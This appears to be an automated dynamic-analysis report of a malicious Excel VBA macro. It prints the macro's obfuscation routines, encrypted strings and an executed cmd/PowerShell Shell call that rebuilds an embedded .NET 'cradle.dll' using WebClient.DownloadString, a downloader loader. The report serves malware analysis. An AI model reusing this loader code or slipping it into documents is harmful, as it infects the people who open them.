47	Lot = GetUserDefaultLCID()	GetUserDefaultLCID
48	iRet1 = GetLocaleInfo(Lot, LOCALE_ICOUNTRY, lpLCDataVar, 0)	kernel32!GetLocaleInfoA(1033,5,,0) LOCALE_ICOUNTRY lpLCDataVar executed
49	Symbol = String$(iRet1, 0)	String$
49	iRet2 = GetLocaleInfo(Lot, LOCALE_ICOUNTRY, Symbol, iRet1)	kernel32!GetLocaleInfoA(1033,5,"\x00\x00",2) LOCALE_ICOUNTRY executed
50	Pos = InStr(Symbol, Chr$(0))	InStr("1\x00","\x00") -> 2 Chr$ executed
51	If Pos > 0 Then
52	Symbol = Left$(Symbol, Pos - 1)	Left$
53	Endif
54	If Symbol = vbLong * 27 Then	vbLong
54	intA = 131
54	ThisWorkbook.vector
54	Else
54	cu = 100
54	Endif
56	End Sub

Subroutine st1_MouseMove, APIs: 0, Strings: 0, Number of lines: 5, Relevance: 0.005

Line	Instruction	Meta Information
58	Private Sub st1_MouseMove(ByVal Button as Integer, ByVal Shift as Integer, ByVal X as Single, ByVal Y as Single)
59	If intA <> 131 Then	executed
59	ThisWorkbook.vector
59	Endif
60	End Sub

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Executed Functions

Subroutine msElementChartTitleCenteredOver, APIs: 9, Strings: 0, Number of lines: 3, Relevance: 16.503

APIs	Meta Information
Shell	Shell("cmd /c "sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)14+@(64,0,0,64,46'+',114,1'+'01,108,111,99,0,0,12,0,0,'+'0,0,96,0,0,0,2,0,0,0,1'+'0)+@(0)14+@(64,0,0,66)+@(0)16+@(96,35,0,0,0,0,0,0,72,0,0,0,2,0,5,0,120,32,0,0,17'+'2,2,0,0,1)+@(0)55'+'+@(19,48,2,0,17,0,0,0,1,'+'0,0,17,0,115,3,0,0,10,2,40,4,0,0,10,10,43,0,6,42,30,2,40,5,0,0,10,42,0,0,0,66,83,74,66,1,0,1,'+'0,0,0,0,0,12'+',0,0,0,118,50,46,48,46,53,48,55,50,55,0,0,0,0,5,0,108,0,0,0,12,1,0,0,35,126,0,0,120,1,0,0,208,0,0,0,35,83,116,114,105,110,103,115,0,0,0,0,7'+'2,2,0,0,8,0,0,0,35,85,83,'+'0,80,2,0,0,16,0,0,0,35,71,85,73,68,0,0,0,96,2,0,0,76,0,0,0,35,66,108,111,98)+@(0)7+@(2,0,0,1,71,21,2,0,9,0,0,0,0,250,1,51,0,22,0,0,1,0,0,0,4,0,0,0,2'+',0,0,0,2,0,0,0,1,0,0,0,5,0,0,0,2,0,0,0,1,0,0,0,1,0,0,0,2,'+'0,0,0,'+'0,0,10,0,1,0,0,0,0,0,6,0,45,0,38,0,6,0,96,0,64,0,6,0,128,0,64,0,10,0,180,0,169,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,16,0,21,0,0,0,5,0,1,0,1,0,80,32,0,0,0,0,150,0,52,0,10,0,1,0,1'+'09,32,0,0,0,0,134,24,58,0,15,0,2,0,0,0,1,0,165,0,17,0,58,0,19,0,25,0,58,0,15,0,33'+',0,58,0,15'+',0'+',33,0,190,0,24,0,9,0,58,0,15,0,46,0,11,0,33,0,46,0,19,0,42,0,29,0,4,128)+@(0)16+@'+'(158,0,0,0,2)+@(0)11+'+'@(1,0,29,0,0,0,0,0,2)+@(0)11+@(1'+',0,38)+@(0)8+@(60,77,111,100,117,108,101,62,0,99,114,97,100,108,101,46,100,108,108,0,82,70,111,108,68,89,75,0,109,115,99,111,114,108,105,98,0,83,121,115,116,101'+',109,0,79,98,106,101,99,116,0,81,99,90,'+'113,'+'1'+'07,0,46,99,116,111,114,0,83,121,115,116,101,10'+'9,46,82,117,110,116,105,109,101,46,67,111,10'+'9,112,105,108,101,11'+'4,83,101,114,118,105,99,101,115,0,67,111,109,112,105,108,'+'97,116,105,111,110,82,101,108,97,120,97,116,105,111,110,115,65,116,116,114,1'+'05,98,117,116,101,0,82,117,110,116,105,109,101,67,111,109,112,97,116,105,98,105,108,105,116,121,65,116,116,114,105'+',98,'+'117,116,101,0,99,1'+'14,97,100,108,101,0,117'+',114,108,0,83,121,1'+'15,11'+'6,101,109,46,78,101,116,0,87,101,98,67,108,105,101,110,116,0,68,111,119'+','+'110,108,111,97,100,83,116'+',114,105,110,103,0,0,0,0,0,3,32,0,0,0,0,0,5'+'8,148,124,63,2,180'+',198,73,168,1'+'11,105,133,161,93,80,139,0,8,183,122,92,86,25,52,224,'+'137,4,0,1,14,14,3,32,'+'0,1,4,32,1,1,8,4,32,1,14,14,3,7,1,14,8,1,0,8,0,0,0,0,0,30,1,0,1,0,84,2,22,87,114,97,'+'112,78,111,110,69,120,99,101,112,116,105,111,110,8'+'4,104,114,111,119,115,1,0,0,0,76,35)+@(0)8+@(0,0,110,35,0,0,0,32)+@(0)22+@(96,35)+@(0)20+@(95,67,111,114,68,108,108,77,97,105,110,0,109,115,99,111,114,101,101,46,100,108,108,0,0,0,0,0,255,37,0,32,64)+@(0)139+@(1,0,16,0,0,0,24,0,0,12'+'8)+@(0)14+@(1,0,1,0,0,0,48,0,0,128)+@(0)14+@(1,0,0,0,0,0,72,0,0,0,88,64,0,0,68,2)+@'+'(0)8+@(0,0,68,2,52,0,0,0,86,0,83,0,95,0,86,0,69,0,82,0,83,0,73,0,79,0'+',78,0,95,0,73,0,78,0,70,0,7'+'9,0,0,'+'0,0'+',0,189,4,239,254,0,0,1)+@(0)16+@(0,63)+@('+'0)7+@(4,0,0,0,2)+@(0)14+@(0,68,0,0,0,1,0,86,0,97,0,114,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0'+',0,0,0,0'+',36,0,4,0,0,0,84,0,114,0,97,0,110,0,115,0,108,0,97,0,116,0,105,0,111,0,110)'+'+@(0)7+@(176,4,164,1,0,0,1,0,83,0,116,0,114,0,105,0,110,0,103,0,70,0,105,0,108,'+'0,101,0,73,0,110,0,102,0,111,0,0,0,128,1,0,0,1,0,48,0,48,0,48,0,48,0,48,0,52,0,98,0,48,0,0,0,44,0,2,0,1,0,70,0,105,0,108,'+'0,101,0,68,0,101,0,,0) -> 1660
Part of subcall function Gle@ThisWorkbook: UBound
Part of subcall function Gle@ThisWorkbook: msoBevelSlope
Part of subcall function Gle@ThisWorkbook: msoblogImageTypeGIF
Part of subcall function Gle@ThisWorkbook: msoBulletNumbered
Part of subcall function Ety@ThisWorkbook: UBound
Part of subcall function Ety@ThisWorkbook: msoblogImageTypeGIF
Part of subcall function Ety@ThisWorkbook: msoBevelCross
Part of subcall function Ts@ThisWorkbook: BackstageGroupStyleWarning

Line	Instruction	Meta Information
72	Sub msElementChartTitleCenteredOver()
73	twing = Shell(Gle(Gle(Ety(Gle(Ety(Leged, Ts)), Ts))) & RawsAndTabs & GeneralOptinss, 0)	Shell("cmd /c "sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)14+@(64,0,0,64,46'+',114,1'+'01,108,111,99,0,0,12,0,0,'+'0,0,96,0,0,0,2,0,0,0,1'+'0)+@(0)14+@(64,0,0,66)+@(0)16+@(96,35,0,0,0,0,0,0,72,0,0,0,2,0,5,0,120,32,0,0,17'+'2,2,0,0,1)+@(0)55'+'+@(19,48,2,0,17,0,0,0,1,'+'0,0,17,0,115,3,0,0,10,2,40,4,0,0,10,10,43,0,6,42,30,2,40,5,0,0,10,42,0,0,0,66,83,74,66,1,0,1,'+'0,0,0,0,0,12'+',0,0,0,118,50,46,48,46,53,48,55,50,55,0,0,0,0,5,0,108,0,0,0,12,1,0,0,35,126,0,0,120,1,0,0,208,0,0,0,35,83,116,114,105,110,103,115,0,0,0,0,7'+'2,2,0,0,8,0,0,0,35,85,83,'+'0,80,2,0,0,16,0,0,0,35,71,85,73,68,0,0,0,96,2,0,0,76,0,0,0,35,66,108,111,98)+@(0)7+@(2,0,0,1,71,21,2,0,9,0,0,0,0,250,1,51,0,22,0,0,1,0,0,0,4,0,0,0,2'+',0,0,0,2,0,0,0,1,0,0,0,5,0,0,0,2,0,0,0,1,0,0,0,1,0,0,0,2,'+'0,0,0,'+'0,0,10,0,1,0,0,0,0,0,6,0,45,0,38,0,6,0,96,0,64,0,6,0,128,0,64,0,10,0,180,0,169,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,16,0,21,0,0,0,5,0,1,0,1,0,80,32,0,0,0,0,150,0,52,0,10,0,1,0,1'+'09,32,0,0,0,0,134,24,58,0,15,0,2,0,0,0,1,0,165,0,17,0,58,0,19,0,25,0,58,0,15,0,33'+',0,58,0,15'+',0'+',33,0,190,0,24,0,9,0,58,0,15,0,46,0,11,0,33,0,46,0,19,0,42,0,29,0,4,128)+@(0)16+@'+'(158,0,0,0,2)+@(0)11+'+'@(1,0,29,0,0,0,0,0,2)+@(0)11+@(1'+',0,38)+@(0)8+@(60,77,111,100,117,108,101,62,0,99,114,97,100,108,101,46,100,108,108,0,82,70,111,108,68,89,75,0,109,115,99,111,114,108,105,98,0,83,121,115,116,101'+',109,0,79,98,106,101,99,116,0,81,99,90,'+'113,'+'1'+'07,0,46,99,116,111,114,0,83,121,115,116,101,10'+'9,46,82,117,110,116,105,109,101,46,67,111,10'+'9,112,105,108,101,11'+'4,83,101,114,118,105,99,101,115,0,67,111,109,112,105,108,'+'97,116,105,111,110,82,101,108,97,120,97,116,105,111,110,115,65,116,116,114,1'+'05,98,117,116,101,0,82,117,110,116,105,109,101,67,111,109,112,97,116,105,98,105,108,105,116,121,65,116,116,114,105'+',98,'+'117,116,101,0,99,1'+'14,97,100,108,101,0,117'+',114,108,0,83,121,1'+'15,11'+'6,101,109,46,78,101,116,0,87,101,98,67,108,105,101,110,116,0,68,111,119'+','+'110,108,111,97,100,83,116'+',114,105,110,103,0,0,0,0,0,3,32,0,0,0,0,0,5'+'8,148,124,63,2,180'+',198,73,168,1'+'11,105,133,161,93,80,139,0,8,183,122,92,86,25,52,224,'+'137,4,0,1,14,14,3,32,'+'0,1,4,32,1,1,8,4,32,1,14,14,3,7,1,14,8,1,0,8,0,0,0,0,0,30,1,0,1,0,84,2,22,87,114,97,'+'112,78,111,110,69,120,99,101,112,116,105,111,110,8'+'4,104,114,111,119,115,1,0,0,0,76,35)+@(0)8+@(0,0,110,35,0,0,0,32)+@(0)22+@(96,35)+@(0)20+@(95,67,111,114,68,108,108,77,97,105,110,0,109,115,99,111,114,101,101,46,100,108,108,0,0,0,0,0,255,37,0,32,64)+@(0)139+@(1,0,16,0,0,0,24,0,0,12'+'8)+@(0)14+@(1,0,1,0,0,0,48,0,0,128)+@(0)14+@(1,0,0,0,0,0,72,0,0,0,88,64,0,0,68,2)+@'+'(0)8+@(0,0,68,2,52,0,0,0,86,0,83,0,95,0,86,0,69,0,82,0,83,0,73,0,79,0'+',78,0,95,0,73,0,78,0,70,0,7'+'9,0,0,'+'0,0'+',0,189,4,239,254,0,0,1)+@(0)16+@(0,63)+@('+'0)7+@(4,0,0,0,2)+@(0)14+@(0,68,0,0,0,1,0,86,0,97,0,114,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0'+',0,0,0,0'+',36,0,4,0,0,0,84,0,114,0,97,0,110,0,115,0,108,0,97,0,116,0,105,0,111,0,110)'+'+@(0)7+@(176,4,164,1,0,0,1,0,83,0,116,0,114,0,105,0,110,0,103,0,70,0,105,0,108,'+'0,101,0,73,0,110,0,102,0,111,0,0,0,128,1,0,0,1,0,48,0,48,0,48,0,48,0,48,0,52,0,98,0,48,0,0,0,44,0,2,0,1,0,70,0,105,0,108,'+'0,101,0,68,0,101,0,,0) -> 1660 executed
74	End Sub

Function GeneralOptinss, APIs: 8, Strings: 1, Number of lines: 5, Relevance: 13.505

APIs	Meta Information
Part of subcall function Gle@ThisWorkbook: UBound
Part of subcall function Gle@ThisWorkbook: msoBevelSlope
Part of subcall function Gle@ThisWorkbook: msoblogImageTypeGIF
Part of subcall function Gle@ThisWorkbook: msoBulletNumbered
Part of subcall function Ety@ThisWorkbook: UBound
Part of subcall function Ety@ThisWorkbook: msoblogImageTypeGIF
Part of subcall function Ety@ThisWorkbook: msoBevelCross
Part of subcall function Ts@ThisWorkbook: BackstageGroupStyleWarning

Strings

Decrypted Strings

"TC9_-;e]CJ_T)9)--:e]CJ_T59.+e]CJ_T4;++30[iuXrMnCgW-)3)[i++Vv03`**(i3-)[)3}}\x7f\x7f2i3/[""h3*[i3}}\x7f\x7f2i3""[h/2""xDC/knucD2.xD2vxD2+x2.xDgID2+x*""i3}[\x7f23}3\x7f[ih/D2Kx2GxD2.xD2,xD+++)""""e/GtNREc""g]*JetC3_73]-JetC9_-7e]CJ_t33+4].JetC;_/8teRGcNgE)""i3)[].JetC5_""6T/rgcnGe*""e]CJ_t:6]-JetC8_-8e]CJ_t33+:].JetC5_/;teRGcNgEj)FI.)e]CJ_t85T/rgcnGe]*JetC3_83]-JetC:_-6e]CJ_t;6.+e]CJ_t43+6+""(""u(VG""""WU?iQRGyUtGJnn""""y/3""""""P/RQqt""Hg/""R{dCruu/""QpkpVPtg""c/""QPqnQI""""""""U""VGX/Tccknd""gQV""4""*V]r{_G""*^""}$\x7f45}}\x7f\x7f32}^\x7f""$h/)""vp.)G).)G)xp.)K)qTOp"")+""""""+""""=&""G}GzWekVpQQevpZG\x7fv^0K$bpQXgMqeOoCbfp$^*0""""$^4}}\x7f\x7f23}^\x7f""$h/)""XpMqugTE)K).Vr.)k)"")0+pKqxgm""*""""""*""""*""""""GI/vVKOGX""TcCkNd<GqV""40+$^cXbngW$^<<""*^""}$\x7f53}}\x7f\x7f24}}\x7f\x7f6$^/""""hX).)V)pGKxQTOPpG)V).TC.)I))G).CKnd)g+""K0xpmq*g""""^*}$\x7f23}^\x7f""$h/G))s).D\"").+^*}$\x7f32}^\x7f/$""ht)Equg)u).)R++""+""""(+""(e""fo""""e1u'IW$'"

Line	Instruction	Meta Information
17	Function GeneralOptinss()
18	Dim Vrr as String	executed
19	Vrr = "TC9_-;e]CJ_T)9)--:e]CJ_T59.+e]CJ_T4;++30[iuXrMnCgW-)3)[i++Vv03`*(i3-)[)3}}\x7f\x7f2i3/[""h3[i3}}\x7f\x7f2i3""[h/2""xDC/knucD2.xD2vxD2+x2.xDgID2+x""i3}[\x7f23}3\x7f[ih/D2Kx2GxD2.xD2,xD+++)""""e/GtNREc""g]JetC3_73]-JetC9_-7e]CJ_t33+4].JetC;_/8teRGcNgE)""i3)[].JetC5_""6T/rgcnGe""e]CJ_t:6]-JetC8_-8e]CJ_t33+:].JetC5_/;teRGcNgEj)FI.)e]CJ_t85T/rgcnGe]JetC3_83]-JetC:_-6e]CJ_t;6.+e]CJ_t43+6+""(""u(VG""""WU?iQRGyUtGJnn""""y/3""""""P/RQqt""Hg/""R{dCruu/""QpkpVPtg""c/""QPqnQI""""""""U""VGX/Tccknd""gQV""4""V]r{_G""^""}$\x7f45}}\x7f\x7f32}^\x7f""$h/)""vp.)G).)G)xp.)K)qTOp"")+""""""+""""=&""G}GzWekVpQQevpZG\x7fv^0K$bpQXgMqeOoCbfp$^0""""$^4}}\x7f\x7f23}^\x7f""$h/)""XpMqugTE)K).Vr.)k)"")0+pKqxgm""""""""""""""""""GI/vVKOGX""TcCkNd<GqV""40+$^cXbngW$^<<""^""}$\x7f53}}\x7f\x7f24}}\x7f\x7f6$^/""""hX).)V)pGKxQTOPpG)V).TC.)I))G).CKnd)g+""K0xpmqg""""^}$\x7f23}^\x7f""$h/G))s).D\"").+^}$\x7f32}^\x7f/$""ht)Equg)u).)R++""+""""(+""(e""fo""""e1u'IW$'"
20	GeneralOptinss = Gle(Gle(Ety(Gle(Ety(Vrr, Ts)), Ts)))
21	End Function

Function RawsAndTabs, APIs: 8, Strings: 0, Number of lines: 3, Relevance: 10.003

APIs	Meta Information
Part of subcall function Gle@ThisWorkbook: UBound
Part of subcall function Gle@ThisWorkbook: msoBevelSlope
Part of subcall function Gle@ThisWorkbook: msoblogImageTypeGIF
Part of subcall function Gle@ThisWorkbook: msoBulletNumbered
Part of subcall function Ety@ThisWorkbook: UBound
Part of subcall function Ety@ThisWorkbook: msoblogImageTypeGIF
Part of subcall function Ety@ThisWorkbook: msoBevelCross
Part of subcall function Ts@ThisWorkbook: BackstageGroupStyleWarning

Line	Instruction	Meta Information
80	Function RawsAndTabs()
81	RawsAndTabs = BoolCounts + VersionRevision + CashN + DigitTestOne + ClenDaataAll + n6 + Gle(Gle(Ety(Gle(Ety(n7, Ts)), - 0))) + n8	executed
82	End Function

Function Gle, APIs: 4, Strings: 0, Number of lines: 12, Relevance: 5.012

APIs	Meta Information
UBound
msoBevelSlope
msoblogImageTypeGIF
msoBulletNumbered

Line	Instruction	Meta Information
23	Function Gle(S as String) as String
24	Dim b() as Byte	executed
25	Dim bb as Byte
26	Dim i as Long
27	b = S
28	For i = 0 To UBound(b) - 2 Step msoBevelSlope	UBound msoBevelSlope
29	bb = b(i)
30	b(i) = b(i + msoblogImageTypeGIF)	msoblogImageTypeGIF
31	b(i + msoBulletNumbered) = bb	msoBulletNumbered
32	Next i	UBound msoBevelSlope
33	Gle = b
34	End Function

Function Ety, APIs: 3, Strings: 0, Number of lines: 9, Relevance: 3.759

APIs	Meta Information
UBound
msoblogImageTypeGIF
msoBevelCross

Line	Instruction	Meta Information
48	Function Ety(S as String, n as Integer) as String
49	Dim b() as Byte	executed
50	Dim i as Long
51	b = S
52	For i = 0 To UBound(b) Step msoblogImageTypeGIF	UBound msoblogImageTypeGIF
53	b(i) = (n + b(i)) And msoBevelCross * 51	msoBevelCross
54	Next i	UBound msoblogImageTypeGIF
55	Ety = b
56	End Function

Function Ts, APIs: 1, Strings: 0, Number of lines: 3, Relevance: 1.253

APIs	Meta Information
BackstageGroupStyleWarning

Line	Instruction	Meta Information
9	Function Ts()
10	Ts = BackstageGroupStyleWarning - 2	BackstageGroupStyleWarning executed
11	End Function

Function Leged, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings	Decrypted Strings
"oe""f1""""e$""Gu""VG""\S?D`""""(""U&gJNnfK3]-_U&gJnNFk3]_5)-)Z""+)(`2xDXUD2+x""i3}[\x7f23}3\x7f[ih/D2mx)O)-D2.xD2sxD2+x""D]v{]g__B9*.92;3.662.5."

Line	Instruction	Meta Information
13	Function Leged()
14	Leged = "oe""f1""""e$""Gu""VG""\S?D`""""(""U&gJNnfK3]-_U&gJnNFk3]_5)-)Z""+)(`2xDXUD2+x""i3}[\x7f23}3\x7f[ih/D2mx)O)-D2.xD2sxD2+x""D]v{]g__B9*.92;3.662.5."	executed
15	End Function

Function BoolCounts, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings

Decrypted Strings

",0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,99,0,0,12,0,0,'+'0,0,96,0,0,0,2,0,0,0,1'+'0)+@(0)*14+@(64,0,0,66)+@(0)*16+@(96,35,0,0,0,0,0"

Line	Instruction	Meta Information
35	Function BoolCounts()
36	BoolCounts = ",0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)14+@(64,0,0,64,46'+',114,1'+'01,108,111,99,0,0,12,0,0,'+'0,0,96,0,0,0,2,0,0,0,1'+'0)+@(0)14+@(64,0,0,66)+@(0)*16+@(96,35,0,0,0,0,0"	executed
37	End Function

Function VersionRevision, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings

Decrypted Strings

",0,72,0,0,0,2,0,5,0,120,32,0,0,17'+'2,2,0,0,1)+@(0)*55'+'+@(19,48,2,0,17,0,0,0,1,'+'0,0,17,0,115,3,0,0,10,2,40,4,0,0,10,10,43,0,6,42,30,2,40,5,0,0,10,42,0,0,0,66,83,74,66,1,0,1,'+'0,0,0,0,0,12'+',0,0,0,118,50,46,48,46,53,48,55,50,55,0,0,0,0,5,0,108,0,0,0,12,1,0,0,35,126,0,0,120,1,0,0,208,0,0,0,35,83,116,114,105,110,103,115,0,0,0,0,7'+'2,2,0,0,8,0,0,0,35,85,83,'+'0,80,2,0,0,16,0,0,0,35,71,85,73,68,0,0,0,96,2,0,0,76,0,0,0,35,66,108,111,98)+@(0)*7+@(2,0,0,1,71,21,2,0,9,0,0,0,0,250,1,51,0,22,0,0,1,0,0,0,4,0,0,0,2'+',0,0,0,2,0,0,0,1,0,0,0,5,0,0,0,2,0,0,0,1,0,0,0,1,0,0,0,2,'+'0,0,0,'+'0,0,10,0,1,0,0,0,0,0,6,0,45,0,38,0,6,0,96,0,64,0,6,0,128,0,64,0,10,0,180,0,169,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,16,0,21,0,0,0,5,0,1,0,1,0,80,32,0,0,0,0,150,0,52,0,10,0,1,0,1'+'09,32,0,0,0,0,134,24,58,0,15,0,2,0,0,0,1,0,165,0,17,0,58,0,19,0,25,0,58,0,15,0,33'+',0,58,0,15'+',0'+',33,0,190,0,24,0,9,0,58,0,15,0,46,0,11,0,33,0,46,0,19,0,42,0,29,0,4,128)+@(0)*16+@'+'(158,0,0"

Line	Instruction	Meta Information
39	Function VersionRevision()
40	VersionRevision = ",0,72,0,0,0,2,0,5,0,120,32,0,0,17'+'2,2,0,0,1)+@(0)55'+'+@(19,48,2,0,17,0,0,0,1,'+'0,0,17,0,115,3,0,0,10,2,40,4,0,0,10,10,43,0,6,42,30,2,40,5,0,0,10,42,0,0,0,66,83,74,66,1,0,1,'+'0,0,0,0,0,12'+',0,0,0,118,50,46,48,46,53,48,55,50,55,0,0,0,0,5,0,108,0,0,0,12,1,0,0,35,126,0,0,120,1,0,0,208,0,0,0,35,83,116,114,105,110,103,115,0,0,0,0,7'+'2,2,0,0,8,0,0,0,35,85,83,'+'0,80,2,0,0,16,0,0,0,35,71,85,73,68,0,0,0,96,2,0,0,76,0,0,0,35,66,108,111,98)+@(0)7+@(2,0,0,1,71,21,2,0,9,0,0,0,0,250,1,51,0,22,0,0,1,0,0,0,4,0,0,0,2'+',0,0,0,2,0,0,0,1,0,0,0,5,0,0,0,2,0,0,0,1,0,0,0,1,0,0,0,2,'+'0,0,0,'+'0,0,10,0,1,0,0,0,0,0,6,0,45,0,38,0,6,0,96,0,64,0,6,0,128,0,64,0,10,0,180,0,169,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,16,0,21,0,0,0,5,0,1,0,1,0,80,32,0,0,0,0,150,0,52,0,10,0,1,0,1'+'09,32,0,0,0,0,134,24,58,0,15,0,2,0,0,0,1,0,165,0,17,0,58,0,19,0,25,0,58,0,15,0,33'+',0,58,0,15'+',0'+',33,0,190,0,24,0,9,0,58,0,15,0,46,0,11,0,33,0,46,0,19,0,42,0,29,0,4,128)+@(0)*16+@'+'(158,0,0"	executed
41	End Function

Subroutine vector, APIs: 1, Strings: 0, Number of lines: 3, Relevance: 1.253

APIs	Meta Information
Part of subcall function msElementChartTitleCenteredOver@ThisWorkbook: Shell

Line	Instruction	Meta Information
42	Sub vector()
43	msElementChartTitleCenteredOver	executed
44	End Sub

Function CashN, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings

Decrypted Strings

",0,2)+@(0)*11+'+'@(1,0,29,0,0,0,0,0,2)+@(0)*11+@(1'+',0,38)+@(0)*8+@(60,77,111,100,117,108,101,62,0,99,114,97,100,108,101,46,100,108,108,0,82,70,111,108,68,89,75,0,109,115,99,111,114,108,105,98,0,83,121,115,116,101'+',109,0,79,98,106,101,99,116,0,81,99,90,'+'113,'+'1'+'07,0,46,99,116,111,114,0,83,121,115,116,101,10'+'9,46,82,117,110,116,105,109,101,46,67,111,10'+'9,112,105,108,101,11'+'4,83,101,114,118,105,99,101,115,0,67,111,109,112,105,108,'+'97,116,105,111,110,82,101,108,97,120,97,116,105,111,110,115,65,116,116,114,1'+'05,98,117,116,101,0,82,117,110,116,105,109,101,67,111,109,112,97,116,105,98,105,108,105,116,121,65,116,116,114,105'+',98,'+'117,116,101,0,99,1'+'14,97,100,108,101,0,117'+',114,108,0,83,121,1'+'15,11'+'6,101,109,46,78,101,116,0,87,101,98,67,108,105,101,110,116,0,68,111,119'+','+'110,108,111,97,100,83,116'+',114,105,110,103,0,0,0